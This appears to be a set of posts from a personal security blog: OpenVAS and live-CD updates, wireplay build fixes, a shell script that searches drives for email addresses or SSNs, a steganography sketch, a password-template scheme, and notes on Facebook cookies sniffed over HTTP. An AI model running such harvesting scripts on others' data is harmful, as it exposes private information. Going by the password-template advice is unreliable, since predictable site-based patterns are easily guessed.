Also, in other news, the OpenVAS Build Repo has added a 10.10 repository for Ubuntu. I have been testing it on my network here with virtual machines strewn about the house and everything seems dandy! I highly recommend you check it out if you are interested. As soon as I get a bit more free time, I will be releasing two virtual appliances updated to run the od-autoassess script (x86 and x86_64) on Maverick with all the new features I have implemented in the script.

Adding the repository is easy, and you can follow my guide here (updated yesterday) to get a new VM up and running. If you find any problems, let me know!

New OpenDiagnostics Live CD Release

Updated ClamAV, Metasploit, od-autoassess script, and did an apt-get upgrade.

Installed netrw, really neat/easy utility for transferring files between computers without dealing with S/FTP. Similar to netcat.

Updated List Of Notable Apps.

Also removed all the fluxbox styles but the default Debian style. Current ISO size is 421 MB.

You can get the latest ISO here. Torrent will be available when I get around to making one (sometime today as well). This may hit the planets before being fully uploaded to my server, so if no release is there, just wait a bit.

Compiling wireplay on x86_64 machines

I found a really neat tool for software fuzzing and general debugging called wireplay a few days ago. I finally got around to trying it out today, but found out pretty quickly it doesn't work right out of the box! A few bugs kept me from compiling wireplay cleanly on my machine, so I am posting them here (after emailing the author of course) so others can maybe get it working as well.

Bug #1: The makefile will only work for x86 machines. You can fix this
by using this as your RUBYINC line in the makefile

RUBYINC := /usr/lib/ruby/1.8/$(shell uname -m)-linux

The current version hardcodes i486 which will not work on all
machines. This way it is more dynamic


Bug #2: libnids1.23 does not compile due to missing expression in
#elif in killtcp.c. You can fix it with the following

On line 121, change
#elif

to

#elif LIBNET_VER != 0

Finding sensitive information from a drive or folder

A quick script for finding email addresses on a massive scale (for instance, on a drive).

#!/bin/env sh

SEARCHPATH="$1"

find "$SEARCHPATH" -type f -print | while IFS=$"\n" read file
do
        echo "\nSearching through $file..."

        MATCHES=`strings "$file" | egrep '([[:alnum:]_.-]{1,64}+@[[:alnum:]_.-]{2,255}+?\.[[:alpha:].]{2,4})'`

        if [ "$MATCHES" != "" ]
        then
                echo "---------------------------\nFound matches, beware false positives:"
                echo "$MATCHES"
        fi
done

unset IFS

False positives are pretty much guaranteed (as long as binary files are on the file system). Most sensitive data follows patterns, so the regex is interchangeable with SSN's or anything else you need to find.

Some example output from running the script on /usr/src/...

Searching through /usr/src/linux-headers-2.6.35-22/include/xen/interface/sched.h...
---------------------------
Found matches, beware false positives:
 * Copyright (c) 2005, Keir Fraser <keir@xensource.com>

Searching through /usr/src/linux-headers-2.6.35-22/include/xen/interface/version.h...
---------------------------
Found matches, beware false positives:
 * Copyright (c) 2005, Nguyen Anh Quynh <aquynh@gmail.com>
 * Copyright (c) 2005, Keir Fraser <keir@xensource.com>

Searching through /usr/src/linux-headers-2.6.35-22/include/xen/interface/physdev.h...

Searching through /usr/src/linux-headers-2.6.35-22/include/xen/interface/event_channel.h...

Searching through /usr/src/linux-headers-2.6.35-22/include/xen/interface/vcpu.h...
---------------------------
Found matches, beware false positives:
 * Copyright (c) 2005, Keir Fraser <keir@xensource.com>

Searching through /usr/src/linux-headers-2.6.35-22/include/xen/interface/memory.h...
---------------------------
Found matches, beware false positives:
 * Copyright (c) 2005, Keir Fraser <keir@xensource.com>

Searching through /usr/src/linux-headers-2.6.35-22/include/xen/interface/elfnote.h...

Searching through /usr/src/linux-headers-2.6.35-22/include/crypto/skcipher.h...
---------------------------
Found matches, beware false positives:
 * Copyright (c) 2007 Herbert Xu <herbert@gondor.apana.org.au>

Searching through /usr/src/linux-headers-2.6.35-22/include/crypto/ctr.h...
---------------------------
Found matches, beware false positives:
 * Copyright (c) 2007 Herbert Xu <herbert@gondor.apana.org.au>

Searching through /usr/src/linux-headers-2.6.35-22/include/crypto/compress.h...

Searching through /usr/src/linux-headers-2.6.35-22/include/crypto/algapi.h...
---------------------------
Found matches, beware false positives:
 * Copyright (c) 2006 Herbert <herbert@gondor.apana.org.au>

Searching through /usr/src/linux-headers-2.6.35-22/include/crypto/hash.h...
---------------------------
Found matches, beware false positives:
 * Copyright (c) 2008 Herbert Xu <herbert@gondor.apana.org.au>

Sloped Steganography

I have been preparing for my MAT exams so that I can skip all the basic math classes and just start off my college math at Calculus, playing with graphs and such. I started thinking of ways that I could use this for a project I am working on, a small steganography kit.

Say you have a binary file that is 20 bytes long that you want to embed the message "Helloworld" (10 bytes, one byte per character) into it, in a way not so obvious to anyone but whom the message is intended for. We will divide both filesizes by 5 in this example for the size of our grid... The grid can be any size that is you can write an equation around.

[M][Z][0][0][0]
[0][0][0][0][0]
[0][0][0][0][0] + [H][e][l][l][o]
[0][0][0][0][0] + [w][o][r][l][d]

We don't care about the binary file, it is the message that is important. If it just seems 'corrupted' by anyone else all the better.

Most of us will probably remember rise over run from elementary school. Treating each row in the message separately, we can insert the message using a slope evenly and easily into the binary file (using 1/1 and -1/1 for "world" and "Hello", respectively). With some trig thrown in, you can get some nice graph-like steganography:

[H][Z][0][0][o]
   \        /
[0][e][r][l][0]
     /\ /\
[0][o][l][l][0]
   /        \
[w][0][0][0][d]

Pardon the rough mockup. Hopefully it is easy to follow.

For the technicals, we assume that [w] is located at (0,0). Both y and x = 0. That gives us a y-max of 4 and an x-max of 5. Our 'Hello' row has its trough at (3,1) and its peak at both (0,4) and (5,4). Our 'world' row has its peak at (3,3) and its troughs at (0,0) and (0,5) . From this, we can derive an equation for each line and can piece together the message.

Of course, as the message/data to be hidden grows, the math can become more and more complicated, but the amount of stealthiness is only limited to your imagination.

OD AutoAssess Network Script

A few days ago, I posted a small bit on automating OpenVAS. I have written a small shell script that I use to automate (almost) full network testing and assessment. The reason I say almost is because you still need to go through the data collected to make sure nothing serious is up.

This script requires htmldoc, metasploit, openvas-client and -scanner, nmap, and zip. I have posted it to my random script and snippets page and will maintain it there, but posting here as well.

May not be perfect, my bash-fu is rusty. Some extra info, htmldoc is quite neat. You can actually specify a logo image to use if you want for your company adding '--header l --logoimage /path/to/logo.jpg'.

UPDATE: Updated code w/ svn repo here.

On passwords (or passphrases)

I read this article trying to justify having a password file storing all of the rest of your sensitive information. I think the author is completely wrong.

I have a system of password templates for specific tasks being done by the password. If the password is being used to complete an administrative task, I have a template (I actually call it a passphrase). For general tasks requiring a password, I have a specific password template.

For instance, l3t_m3_1n_$sitename (template isn't real, just for showing purposes) would be a fairly legitimate passphrase, replacing $sitename with a word that describes the website at hand (maybe the site name, maybe the site topic). If you subscribed to the wall street journal's website, your passphrase may be l3t_m3_1n_wsj. If you were an admin for wall street journal, you may use the template l3t_m3_adm1n_wsj.

With this system, your password will be different for each website you use, thoroughly complex enough keep the passphrase from being cracked, and the templates themselves don't change, so what you remember is far less than what the password itself is.

The only nuance I have found is that not all websites allow the same characters in passwords, which does get annoying.

How much can I learn about you while you browse CNN?

Generally, I get my news from three sources: BBC, CNN, and Digg (oh well, not all news :-P). Today, I had a very nasty surprise when I went to CNN.

A list of my friend's facebook statuses and "groups" people had liked related to the content on the CNN homepage. Every time I refreshed the page, the groups and statuses changed. This disturbs me for two reasons that I hope don't sound absolutely crazy.

The first reason: If a person is listening over your network with something like wireshark, he now has a list of people you know just after a few page clicks. He can look these people up on facebook and get a lot of information on you just with that. Maybe a mandatory HTTPS:// on any site consuming the facebook api in the way is the way to go?

The second reason: Does this adhere to the privacy settings I set? or does this adhere to the friends who can see me when logged in? If my statuses are being sent onto a web site like that, that would make me incredibly uncomfortable.

I have gone to great lengths to make sure what I put on face book stays on facebook. These gadgets are poking up everywhere, and simple javascript exploits could gather this data, let alone trojans, activex controls, or rogue BHO's.

Am I just being too paranoid?

And just FYI: If you ever need any info on people, it's scary how much info you can get from facebook not even being their friend.


EDIT: Ok, I did some research using wireshark. I was successfully able to capture my Facebook integer ID that they used before we all had 'usernames' and find myself. Not only that, but it was my whole facebook cookie.

Stupid IE password box behavior

If you have special characters in your password like most good passwords should, and you type your password (with special chars) into a textbox in password mode and use ctrl+bkspc to clear the password, it will give you the location of the special chars in the password box.

I consider this a gigantic security flaw and is pretty terrible. I have only found this behavior in IE. Is this known? I seem to remember running into this for years.


EDIT:

for example, try this

go to gmail in IE

focus on the password box and type "password" (no quotes) and then hit ctrl+bkspc

then do the same for 'pass/word' (no quote)